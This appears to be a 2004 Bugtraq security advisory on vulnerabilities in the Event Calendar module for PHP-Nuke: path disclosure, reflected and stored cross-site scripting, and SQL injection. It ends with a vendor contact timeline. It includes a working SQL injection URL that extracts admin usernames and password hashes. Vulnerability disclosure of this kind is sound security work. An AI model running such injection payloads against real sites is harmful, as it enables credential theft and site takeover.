[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: [waraxe-2004-SA#038 - Multiple vulnerabilities in Event Calendar
From: Janek Vind <come2waraxe () yahoo ! com>
Date: 2004-11-16 23:04:21
Message-ID: 20041117042243.23012.qmail () www ! securityfocus ! com
[Download RAW message or body]
{================================================================================}
{ [waraxe-2004-SA#038] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in Event Calendar module for PhpNuke ] }
{ }
{================================================================================}
\
Author: Janek Vind "waraxe"
Date: 17. November 2004
Location: Estonia, Tartu
Web: http://www.waraxe.us/index.php?modname=sa&id=38
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Module's Name: Event Calendar
Module's Version: 2.13 - March 16th, 2004
Module's Description: Provides an event calendar for PHP-Nuke communities.
License: GNU/GPL
Author's Name: Original author - Rob Sutton. Development continued by Holbrookau.
Author's Email: phpnuke@holbrookau.net
Event Calendar - a module for PHP-Nuke.
Based on version 1.5 by Rob Sutton, the Event Calendar found here is much updated
and features many improvments and add-ons. For example, the administration area \
features configuration via a graphical interface, posting of events can be moderated \
and users even have the option of adding comments to any event.
Homepage: http://phpnuke.holbrookau.net/
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This piece of sowtware has many security related flaws due to poor user-submitted \
data handling.
A - Full Path Disclosure
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A1 - full path disclosure in "config.php":
http://localhost/nuke73/modules/Calendar/config.php
Warning: main(modules/Calendar/configset.php): failed to open stream: No such file or \
directory in D:\apache_wwwroot\nuke73\modules\Calendar\config.php on \
line 11
Warning: main(): Failed opening 'modules/Calendar/configset.php' for inclusion \
(include_path='.;c:\php4\pear') in \
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 11
Warning: main(mainfile.php): failed to open stream: No such file or directory in \
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(): Failed opening 'mainfile.php' for inclusion \
(include_path='.;c:\php4\pear') in \
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 14
Warning: main(modules//language/lang-english.php): failed to open stream: No such \
file or directory in \
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
Warning: main(): Failed opening 'modules//language/lang-english.php' for inclusion \
(include_path='.;c:\php4\pear') in \
D:\apache_wwwroot\nuke73\modules\Calendar\config.php on line 19
A2, A3 - full path disclosure in "index.php" and "submit.php":
http://localhost/nuke73/modules/Calendar/index.php
http://localhost/nuke73/modules/Calendar/submit.php
B - XSS aka cross site scripting:
Examples:
http://localhost/nuke73/modules.php?name=Calendar&file=submit&type=[xss code here]
http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&day=[xss \
code here] http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&month=[xss \
code here] http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&year=[xss \
code here] http://localhost/nuke73/modules.php?name=Calendar&file=submit&op2=Preview&type=[xss \
code here]
C - script injection in calendar event comments:
It's serious bug - anyone can insert javascript exploit code to event comments
and if user or admin will read it, javascript will trigger and bad things can
happen - like cookie theft, arbitrary admin operations, etc.
D - critical sql injection bugs in code:
If we take a deep look at source code, then there can be found multiple sql queries,
where some variables, mostly "$eid" and "$cid" ARE NOT surrounded with single quotes.
Therefore sql injection is possible. Further exploitation will depend on database
software and version. In case of the mysql version 4.x with UNION functionality \
enabled, arbitrary data can be retrieved from database, inluding admin(s) \
authentication credentials. As tradition, there is proof of concept:
----------------[ real life exploit ]---------------
http://localhost/nuke73/modules.php?name=Calendar&file=index&type=view&eid=-99%20UNION%20ALL%20SELECT
%201,1,aid,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper=1
----------------[/real life exploit ]---------------
How to fix:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Vendor contacted: 06. September 2004
Vendor responded: 06. September 2004
Detailed list of problems sent to vendor: 08. September 2004
Since then no more response from software developer and downloadable version
still unpatched.
For help with patching look @ here - http://www.waraxe.us/forums.html
Additional recources:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Free proxy lists - http://www.waraxe.us/forum/viewforum.php?f=21
Base64 online tool - http://base64-encoder-online.waraxe.us/base64/base64-encoder.php
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to Raido Kerna, icenix, g0df4th3r and slimjim100!
Tervitused - Heintz ja Maku!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
Homepage: http://www.waraxe.us/
---------------------------------- [ EOF ] ------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic